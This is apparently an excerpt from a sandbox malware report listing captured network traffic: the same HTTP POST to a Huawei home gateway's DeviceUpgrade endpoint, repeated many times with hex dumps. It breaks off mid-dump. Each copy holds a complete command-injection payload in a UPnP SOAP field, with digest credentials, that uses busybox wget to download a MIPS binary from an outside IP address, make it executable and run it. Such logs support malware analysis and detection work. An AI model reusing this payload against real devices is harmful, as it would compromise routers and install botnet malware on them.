30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 